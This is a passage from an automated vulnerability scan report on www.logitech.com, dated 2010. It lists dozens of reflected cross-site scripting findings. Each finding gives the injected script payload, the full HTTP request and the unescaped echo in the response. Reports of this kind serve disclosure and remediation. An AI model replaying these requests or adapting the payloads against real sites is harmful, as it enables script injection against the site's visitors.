This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/v2/mobile.cssb39ea</script><script>alert(1)</script>b88e47674bb HTTP/1.1
Accept: */*
Referer: http://www.logitech.com/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.logitech.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:49:37 GMT
Connection: keep-alive
Content-Length: 31415


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','css/v2/mobile.cssb39ea</script><script>alert(1)</script>b88e47674bb' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.155. http://www.logitech.com/css/v2/promotion.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/promotion.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fc9d"><script>alert(1)</script>ad36cb01ee0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/v2/promotion.css4fc9d"><script>alert(1)</script>ad36cb01ee0 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.logitech.com/349/7073

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:00:12 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="css/v2/promotion.css4fc9d"><script>alert(1)</script>ad36cb01ee0">
...[SNIP]...

1.156. http://www.logitech.com/css/v2/promotion.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/promotion.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e0933</script><script>alert(1)</script>188d5e56fa9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/v2/promotion.csse0933</script><script>alert(1)</script>188d5e56fa9 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.logitech.com/349/7073

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:00:17 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','css/v2/promotion.csse0933</script><script>alert(1)</script>188d5e56fa9' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.157. http://www.logitech.com/css/v2/search.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/search.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b620"><script>alert(1)</script>b75ea8aed41 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/v2/search.css3b620"><script>alert(1)</script>b75ea8aed41 HTTP/1.1
Accept: */*
Referer: http://www.logitech.com/en-us/search?q=%60
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.logitech.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:51:16 GMT
Connection: keep-alive
Content-Length: 31383


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="css/v2/search.css3b620"><script>alert(1)</script>b75ea8aed41">
...[SNIP]...

1.158. http://www.logitech.com/css/v2/search.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/search.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dbdff</script><script>alert(1)</script>322e8945bf5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/v2/search.cssdbdff</script><script>alert(1)</script>322e8945bf5 HTTP/1.1
Accept: */*
Referer: http://www.logitech.com/en-us/search?q=%60
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.logitech.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:51:23 GMT
Connection: keep-alive
Content-Length: 31415


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','css/v2/search.cssdbdff</script><script>alert(1)</script>322e8945bf5' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.159. http://www.logitech.com/css/v2/showcase.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/showcase.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7df8a"><script>alert(1)</script>ab912e18d42 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/v2/showcase.css7df8a"><script>alert(1)</script>ab912e18d42 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.logitech.com/349/7073

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:00:12 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="css/v2/showcase.css7df8a"><script>alert(1)</script>ab912e18d42">
...[SNIP]...

1.160. http://www.logitech.com/css/v2/showcase.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/showcase.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3e47d</script><script>alert(1)</script>84ef89d4f23 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/v2/showcase.css3e47d</script><script>alert(1)</script>84ef89d4f23 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.logitech.com/349/7073

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:00:18 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','css/v2/showcase.css3e47d</script><script>alert(1)</script>84ef89d4f23' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.161. http://www.logitech.com/css/v2/subnav.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/subnav.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e27d7"><script>alert(1)</script>02d0fb5f3cf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/v2/subnav.csse27d7"><script>alert(1)</script>02d0fb5f3cf HTTP/1.1
Accept: */*
Referer: http://www.logitech.com/en-us/webcam-communications
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.logitech.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:51:19 GMT
Connection: keep-alive
Content-Length: 31383


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="css/v2/subnav.csse27d7"><script>alert(1)</script>02d0fb5f3cf">
...[SNIP]...

1.162. http://www.logitech.com/css/v2/subnav.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/subnav.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bbe56</script><script>alert(1)</script>ae944f1784a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/v2/subnav.cssbbe56</script><script>alert(1)</script>ae944f1784a HTTP/1.1
Accept: */*
Referer: http://www.logitech.com/en-us/webcam-communications
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.logitech.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:51:26 GMT
Connection: keep-alive
Content-Length: 31415


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','css/v2/subnav.cssbbe56</script><script>alert(1)</script>ae944f1784a' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.163. http://www.logitech.com/en-us [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79af2"><script>alert(1)</script>b47b84ef801 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en-us79af2"><script>alert(1)</script>b47b84ef801 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:52:42 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="en-us79af2"><script>alert(1)</script>b47b84ef801">
...[SNIP]...

1.164. http://www.logitech.com/en-us [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a79c4</script><script>alert(1)</script>ed223318e31 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en-usa79c4</script><script>alert(1)</script>ed223318e31 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:52:47 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','en-usa79c4</script><script>alert(1)</script>ed223318e31' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.165. http://www.logitech.com/en-us [seo parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us

Issue detail

The value of the seo request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 88f1f</script><script>alert(1)</script>5a9cd263270 was submitted in the seo parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en-us?seo=349/707388f1f</script><script>alert(1)</script>5a9cd263270&geo=US HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.logitech.com/349/7073

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:50 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','en-us,349/707388f1f</script><script>alert(1)</script>5a9cd263270' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.166. http://www.logitech.com/en-us [seo parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us

Issue detail

The value of the seo request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae65f"><script>alert(1)</script>7da9abf12e9 was submitted in the seo parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en-us?seo=349/7073ae65f"><script>alert(1)</script>7da9abf12e9&geo=US HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.logitech.com/349/7073

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:41 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="en-us,349/7073ae65f"><script>alert(1)</script>7da9abf12e9">
...[SNIP]...

1.167. http://www.logitech.com/en-us/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2b54"><script>alert(1)</script>7be0a39aa14 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en-usc2b54"><script>alert(1)</script>7be0a39aa14/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:57:24 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="en-usc2b54"><script>alert(1)</script>7be0a39aa14">
...[SNIP]...

1.168. http://www.logitech.com/en-us/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d951</script><script>alert(1)</script>e786a4bffbe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en-us9d951</script><script>alert(1)</script>e786a4bffbe/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:57:34 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','en-us9d951</script><script>alert(1)</script>e786a4bffbe' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.169. http://www.logitech.com/en-us/1039 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.logitech.com
Path:   /en-us/1039

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6aa14"%3bd632a6ba26b was submitted in the REST URL parameter 1. This input was echoed as 6aa14";d632a6ba26b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en-us6aa14"%3bd632a6ba26b/1039 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:42:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script language="javascript">
       
        try {        
            var thisUrl = "www.logitech.com/en-us6aa14";d632a6ba26b/1039";
            document.domain = "logitech.com";
           }
           catch (e) {}
   
</script>
...[SNIP]...

1.170. http://www.logitech.com/en-us/1039 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/1039

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e340"><script>alert(1)</script>e5843c6de3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en-us4e340"><script>alert(1)</script>e5843c6de3/1039 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:42:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="en-us4e340"><script>alert(1)</script>e5843c6de3/1039">
...[SNIP]...

1.171. http://www.logitech.com/en-us/1039 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/1039

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 26c54</script><script>alert(1)</script>7bff87b4bb6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /26c54</script><script>alert(1)</script>7bff87b4bb6/1039 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:42:39 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','26c54</script><script>alert(1)</script>7bff87b4bb6/1039' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.d
...[SNIP]...

1.172. http://www.logitech.com/en-us/1039 [REST URL parameter 2]  previous  next

Summary

